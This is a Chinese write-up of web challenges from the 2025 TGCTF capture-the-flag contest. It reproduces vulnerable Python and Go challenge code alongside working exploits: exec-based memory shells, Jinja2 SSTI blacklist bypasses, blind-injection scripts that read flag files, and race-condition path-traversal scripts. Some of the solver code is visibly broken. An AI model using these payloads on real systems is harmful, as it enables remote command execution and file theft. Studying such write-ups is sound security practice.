Featured image of post 2025TGCTF复现

2025TGCTF复现

2025TGCTF复现

AAA偷渡阴平(复仇)

预期

session没禁用

image-20250415000000376

非预期

1
/?tgctf2025=system(implode(apache_request_headers()));
1
/?tgctf2025=system(hex2bin(licfirst(key(apache_request_headers()))));

熟悉的配方,熟悉的味道

源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pyramid.config import Configurator
from pyramid.request import Request
from pyramid.response import Response
from pyramid.view import view_config
from wsgiref.simple_server import make_server
from pyramid.events import NewResponse
import re
from jinja2 import Environment, BaseLoader

eval_globals = { #防止eval执行恶意代码
    '__builtins__': {},      # 禁用所有内置函数
    '__import__': None       # 禁止动态导入
}


def checkExpr(expr_input):
    expr = re.split(r"[-+*/]", expr_input)
    print(exec(expr_input))

    if len(expr) != 2:
        return 0
    try:
        int(expr[0])
        int(expr[1])
    except:
        return 0

    return 1


def home_view(request):
    expr_input = ""
    result = ""

    if request.method == 'POST':
        expr_input = request.POST['expr']
        if checkExpr(expr_input):
            try:
                result = eval(expr_input, eval_globals)
            except Exception as e:
                result = e
        else:
            result = "爬!"


    template_str = xxx

    env = Environment(loader=BaseLoader())
    template = env.from_string(template_str)
    rendered = template.render(expr_input=expr_input, result=result)
    return Response(rendered)


if __name__ == '__main__':
    with Configurator() as config:
        config.add_route('home_view', '/')
        config.add_view(home_view, route_name='home_view')
        app = config.make_wsgi_app()

    server = make_server('0.0.0.0', 9040, app)
    server.serve_forever()

eval设了很严格的限制,但是没禁用exec

用exec打内存马

1
2
3
expr=exec("config.add_route('shell_route','/shell');config.add_view(lambda
request:Response(__import__('os').popen(request.params.get('a')).read()),route
_name='shell_route');app = config.make_wsgi_app()")

或者用request.add_response_callback 钩子函数进行回显。(是个好方法,但是这里用不了,因为exec不在home_view下没有request)

1
2
3
print(exec("request.add_response_callback(lambda request,
response:setattr(response, 'text', getattr(getattr(__import__('os'),'popen')
('whoami'),'read')()))"));

其他办法

利用抛出错误,用污染HTTP 500的返回消息实现回显,这里用wsgi打

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
import requests
url = "http://127.0.0.1:59183/"

code = f"""
b = re.match.__globals__['__builtins__']
b["setattr"](b['__import__']('wsgiref').handlers.BaseHandler,"error_body",b["__import__"]('os').popen('cat /flagggggg_tgctf2025_asjdklalkcnkjassjhdlk').read().encode())
raise Exception("1")
"""

resp = requests.post(url, data = {
    "expr": f"exec({code!r})",
})
print(resp.status_code)
print(resp.text)

同样的原理可以胁持404界面

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
import requests

url = 'http://127.0.0.1:59183/'

payload = "cat /flagggggg_tgctf2025_asjdklalkcnkjassjhdlk"

exp = f'''
def shell(request):
    import os
    res = os.popen("{payload}").read()
    return Response(res)
config.add_route('cmd', '/cmd')
config.add_view(shell, route_name='cmd')
config.commit()
'''

data = {"expr": exp}
res = requests.post(url, data=data)
p = requests.get(url + '/cmd')
print(p.text)

时间盲注

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import string
import time
import os
import requests
url = "http://node1.tgctf.woooo.tech:31931/"
ans = ""
for i in range(0, 100):
    for strr in string.printable:
        shell = f"""
import os
import time
a = os.popen('cat /fl*').read()
if len(a) > {i} and a[{i}] == '{strr}':
    time.sleep(2)
"""
        start = time.time()
       
        requests.post(url, data={'expr': shell})
        
        end = time.time()
        if end - start > 2:
            ans += strr
            print(ans)

布尔盲注

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
import string
import requests
from tqdm import tqdm
url = "http://node1.tgctf.woooo.tech:30215"
flag = "TGCTF{028b2d11-2783-464c-8cea-fda040"

for i in range(len(flag),50):
    # for s in 'TGCTF{':
    for s in tqdm('-'+'}'+'{'+string.ascii_lowercase+string.digits):
        data = {"expr":f"import os,operator;f=os.popen('cat /f*').read();a=int(operator.eq(f[{i}],'{s}'));1/a"}
        # res = requests.post(url, data=json)
        res = requests.post(url, data=data)
        # print(res.text, s)
        if res.text != "A server error occurred.  Please contact the administrator.":
            flag += s
            print(flag)
            break
    print(i)

直面天命(复仇)

fenjing一把梭(

源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
import os
import string
from flask import Flask, request, render_template_string, jsonify, send_from_directory
from a.b.c.d.secret import secret_key

app = Flask(__name__)

black_list=['lipsum','|','%','{','}','map','chr', 'value', 'get', "url", 'pop','include','popen','os','import','eval','_','system','read','base','globals','_.','set','application','getitem','request', '+', 'init', 'arg', 'config', 'app', 'self']
def waf(name):
    for x in black_list:
        if x in name.lower():
            return True
    return False
def is_typable(char):
    # 定义可通过标准 QWERTY 键盘输入的字符集
    typable_chars = string.ascii_letters + string.digits + string.punctuation + string.whitespace
    return char in typable_chars

@app.route('/')
def home():
    return send_from_directory('static', 'index.html')

@app.route('/jingu', methods=['POST'])
def greet():
    template1=""
    template2=""
    name = request.form.get('name')
    template = f'{name}'
    if waf(name):
        template = '想干坏事了是吧hacker?哼,还天命人,可笑,可悲,可叹
Image'
    else:
        k=0
        for i in name:
            if is_typable(i):
                continue
            k=1
            break
        if k==1:
            if not (secret_key[:2] in name and secret_key[2:]):
                template = '连“六根”都凑不齐,谈什么天命不天命的,还是戴上这金箍吧

再去西行历练历练

Image'
                return render_template_string(template)
            template1 = "“六根”也凑齐了,你已经可以直面天命了!我帮你把“secret_key”替换为了“{{}}”
最后如果你用了cat就可以见到齐天大圣了
"
            template= template.replace("天命","{{").replace("难违","}}")
            template = template
    if "cat" in template:
        template2 = '
或许你这只叫天命人的猴子真的能做到

Image'
    try:
        return template1+render_template_string(template)+render_template_string(template2)
    except Exception as e:
        error_message = f"500报错了,查询语句如下:
{template}"
        return error_message, 400

@app.route('/hint', methods=['GET'])
def hinter():
    template="hint:
有一个aazz路由去那里看看吧天命人!"
    return render_template_string(template)

@app.route('/aazz', methods=['GET'])
def finder():
    with open(__file__, 'r') as f:
        source_code = f.read()
    return f"

{source_code}

", 200, {'Content-Type': 'text/html; charset=utf-8'}

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

secret_key可以去原版本读到

1
secret_key = "直面天命"

fenjing操作

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
from fenjing import exec_cmd_payload, config_payload

def waf(s: str):
    blacklist = ['lipsum','|','%','map','chr', 'value', 'get', "url", 'pop','include','popen','os','import','eval','_','system','read','base','globals','_.','set','application','getitem','request', '+', 'init', 'arg', 'config', 'app', 'self']
    return all(word not in s for word in blacklist)

if __name__ == "__main__":
    shell_payload, _ = exec_cmd_payload(waf, "cat /tgffff11111aaaagggggggg")
    shell_payload = shell_payload.replace("{{", "天命").replace("}}", "难违")
    print(f"{shell_payload}")

或者unicode绕

1
直面天命g['\u0070\u006f\u0070']['\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f']['\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f']['\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f']('so'[::-1])['\u0070\u006f\u0070\u0065\u006e']('cat /*')['\u0072\u0065\u0061\u0064']()难违

官方payload

1
2
3
直面[]["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]
["\x5f\x5fsubclasses\x5f\x5f"]()[351]('cat
flag',shell=True,stdout=-1).communicate()[0].strip()天命

老登,炸鱼来了?

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
package main

import (
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"path/filepath"
	"strings"
	"text/template"
	"time"
)

type Note struct {
	Name       string
	ModTime    string
	Size       int64
	IsMarkdown bool
}

var templates = template.Must(template.ParseGlob("templates/*"))

type PageData struct {
	Notes []Note
	Error string
}

func blackJack(path string) error {

	if strings.Contains(path, "..") || strings.Contains(path, "/") || strings.Contains(path, "flag") {
		return fmt.Errorf("非法路径")
	}

	return nil
}

func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {
	safe := templates.ExecuteTemplate(w, tmpl, data)
	if safe != nil {
		http.Error(w, safe.Error(), http.StatusInternalServerError)
	}
}

func renderError(w http.ResponseWriter, message string, code int) {
	w.WriteHeader(code)
	templates.ExecuteTemplate(w, "error.html", map[string]interface{}{
		"Code":    code,
		"Message": message,
	})
}

func main() {
	os.Mkdir("notes", 0755)

	safe := blackJack("/flag") //错误示范,return fmt.Errorf("非法路径")

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		files, safe := os.ReadDir("notes")
		if safe != nil {
			renderError(w, "无法读取目录", http.StatusInternalServerError)
			return
		}

		var notes []Note
		for _, f := range files {
			if f.IsDir() {
				continue
			}

			info, _ := f.Info()
			notes = append(notes, Note{
				Name:       f.Name(),
				ModTime:    info.ModTime().Format("2006-01-02 15:04"),
				Size:       info.Size(),
				IsMarkdown: strings.HasSuffix(f.Name(), ".md"),
			})
		}

		renderTemplate(w, "index.html", PageData{Notes: notes})
	})

	http.HandleFunc("/read", func(w http.ResponseWriter, r *http.Request) {
		name := r.URL.Query().Get("name")

		if safe = blackJack(name); safe != nil {
			renderError(w, safe.Error(), http.StatusBadRequest)
			return
		}

		file, safe := os.Open(filepath.Join("notes", name))
		if safe != nil {
			renderError(w, "文件不存在", http.StatusNotFound)
			return
		}

		data, safe := io.ReadAll(io.LimitReader(file, 10240))
		if safe != nil {
			renderError(w, "读取失败", http.StatusInternalServerError)
			return
		}

		if strings.HasSuffix(name, ".md") {
			w.Header().Set("Content-Type", "text/html")
			fmt.Fprintf(w, `<html><head><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/github-markdown-css/5.1.0/github-markdown.min.css"></head><body class="markdown-body">%s</body></html>`, data)
		} else {
			w.Header().Set("Content-Type", "text/plain")
			w.Write(data)
		}
	})

	http.HandleFunc("/write", func(w http.ResponseWriter, r *http.Request) {
		if r.Method != "POST" {
			renderError(w, "方法不允许", http.StatusMethodNotAllowed)
			return
		}

		name := r.FormValue("name")
		content := r.FormValue("content")

		if safe = blackJack(name); safe != nil {
			renderError(w, safe.Error(), http.StatusBadRequest)
			return
		}

		if r.FormValue("format") == "markdown" && !strings.HasSuffix(name, ".md") {
			name += ".md"
		} else {
			name += ".txt"
		}

		if len(content) > 10240 {
			content = content[:10240]
		}

		safe := os.WriteFile(filepath.Join("notes", name), []byte(content), 0600)
		if safe != nil {
			renderError(w, "保存失败", http.StatusInternalServerError)
			return
		}

		http.Redirect(w, r, "/", http.StatusSeeOther)
	})

	http.HandleFunc("/delete", func(w http.ResponseWriter, r *http.Request) {
		name := r.URL.Query().Get("name")
		if safe = blackJack(name); safe != nil {
			renderError(w, safe.Error(), http.StatusBadRequest)
			return
		}

		safe := os.Remove(filepath.Join("notes", name))
		if safe != nil {
			renderError(w, "删除失败", http.StatusInternalServerError)
			return
		}

		http.Redirect(w, r, "/", http.StatusSeeOther)
	})

	// 静态文件服务
	http.Handle("/static/", http.StripPrefix("/static/", http.FileServer(http.Dir("static"))))

	srv := &http.Server{
		Addr:         ":9046",
		ReadTimeout:  10 * time.Second,
		WriteTimeout: 15 * time.Second,
	}
	log.Fatal(srv.ListenAndServe())
}

漏洞点在这

1
2
3
4
if safe = blackJack(name); safe != nil {
			renderError(w, safe.Error(), http.StatusBadRequest)
			return
		}

在Go中,运算符 :=用于变量声明和赋值,并且=只能用于变量赋值。

第一次输入一个任意的 name ,使得 safe 被赋值为 nil ,然后立刻读取flag,此时

err 还会是 nil

官方exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import aiohttp
import asyncio
import time
class Solver:
 def __init__(self, baseUrl):
     self.baseUrl = baseUrl
     self.READ_FILE_ENDPOINT = f'{self.baseUrl}'
     self.VALID_CHECK_PARAMETER = '/read?name=1'
     self.INVALID_CHECK_PARAMETER = '/read?name=../../../flag'
     self.RACE_CONDITION_JOBS = 100
 async def raceValidationCheck(self, session, parameter):
     url = f'{self.READ_FILE_ENDPOINT}{parameter}'
     async with session.get(url) as response:
         return await response.text()
 async def raceCondition(self, session):
     tasks = list()
     for _ in range(self.RACE_CONDITION_JOBS):
         tasks.append(self.raceValidationCheck(session,self.VALID_CHECK_PARAMETER))
         tasks.append(self.raceValidationCheck(session,self.INVALID_CHECK_PARAMETER))
         return await asyncio.gather(*tasks)

 async def solve(self):
     async with aiohttp.ClientSession() as session:
         attempts = 1
         finishedRaceConditionJobs = 0
         while True:
             print(f'[*] Attempts < #{attempts} - Finished race conditionjobs: {finishedRaceConditionJobs}')
             results = await self.raceCondition(session)
             attempts += 1
             finishedRaceConditionJobs += self.RACE_CONDITION_JOBS
             for result in results:
                 if 'TGCTF{' not in result:
                     continue

                     print(f'\n[+] We won the race window! Flag:{result.strip()}')
                     exit(0)
if __name__== '__main__':
    baseUrl = 'http://127.0.0.1:63028/'
    solver = Solver(baseUrl)
    asyncio.run(solver.solve())

拉蒙特徐的exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import aiohttp
import asyncio
import time

class Solver:
    def __init__(self, baseUrl):
        self.baseUrl = baseUrl
        self.READ_FILE_ENDPOINT = f'{self.baseUrl}'
        self.VALID_CHECK_PARAMETER = '/write?name=123.md&content=flag&format=markdown'
        self.INVALID_CHECK_PARAMETER = '/read?name=../../../../../flag'
        self.RACE_CONDITION_JOBS = 100

    async def setSessionCookie(self, session):
        await session.get(self.baseUrl)

    async def raceValidationCheck(self, session, parameter):
        url = f'{self.READ_FILE_ENDPOINT}{parameter}'
        async with session.get(url) as response:
            return await response.text()

    async def raceCondition(self, session):
        tasks = list()
        for _ in range(self.RACE_CONDITION_JOBS):
            tasks.append(self.raceValidationCheck(session, self.VALID_CHECK_PARAMETER))
            tasks.append(self.raceValidationCheck(session, self.INVALID_CHECK_PARAMETER))
        return await asyncio.gather(*tasks)

    async def solve(self):
        async with aiohttp.ClientSession() as session:
            await asyncio.sleep(1) # wait for the reverse proxy creation

            attempts = 1
            finishedRaceConditionJobs = 0
            while True:
                print(f'[*] Attempts #{attempts} - Finished race condition jobs: {finishedRaceConditionJobs}', end='\r')

                results = await self.raceCondition(session)
                attempts += 1
                finishedRaceConditionJobs += self.RACE_CONDITION_JOBS
                for result in results:
                    print(result)
                    if 'TGCTF{' not in result:
                        continue

                    print(f'\n[+] We won the race window! Flag: {result.strip()}')
                    exit(0)

if name == '__main__':
    baseUrl = 'http://node1.tgctf.woooo.tech:30308' # for local testing
    # baseUrl = 'http://49.13.169.154:8088'
    solver = Solver(baseUrl)

    asyncio.run(solver.solve())
Licensed under 9u_l3
使用 Hugo 构建
主题 StackJimmy 设计